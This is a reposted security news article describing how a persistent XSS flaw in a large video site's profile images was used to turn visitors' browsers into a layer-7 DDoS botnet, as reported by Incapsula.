Vulnerability in World's Largest Site Turned Million of Visitors into DDoS Zombies

[Silviu]

An application layer or 'layer 7' distributed denial of service (DDoS) attacks is one of the most complicated web attack that disguised to look like legitimate traffic but targets specific areas of a website, making it even more difficult to detect and mitigate.

Just Yesterday Cloud-based security service provider 'Incapsula' detected a unique application layer DDoS attack, carried out using traffic hijacking techniques. DDoS attack flooded on of their client with over 20 million GET requests, originating from browsers of over 22,000 Internet users.

What makes this case especially interesting is the fact that the attack was enabled by persistent XSS vulnerability in one of the world’s largest and most popular site - one of the domains on Alexa’s “Top 50” list.

XSS vulnerability to Large-Scale DDoS Attack

Incapsula has not disclosed the name of vulnerable website for security reasons, but mentioned it as a high profile video content provider website, allows its users to sign-up and sign-in with their own profiles.

The DDoS attack was enabled by a Persistent XSS (Cross site scripting) vulnerability that allowed the attacker to inject a malicious JavaScript code into the tag associated with the profile image.

So, as each time a legitimate visitor arrived to any webpage on the vulnerable pages (e.g. pages where attacker has commented from his profile), attacker's profile image will also load into the visitor's browser and it would automatically execute the injected JavaScript which in turn injects a hidden iframe with the address of the DDoSers C&C domain.

According to Incapsula, attackers are using a Ajax-script based DDoS tool, that force browser to issue a DDoS request at a rate of one request per minute.

"Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length and with thousands of views every minute, the attack can quickly become very large and extremely dangerous." researchers explained.

Sursa: The Hacker News - Latest Cyber Security News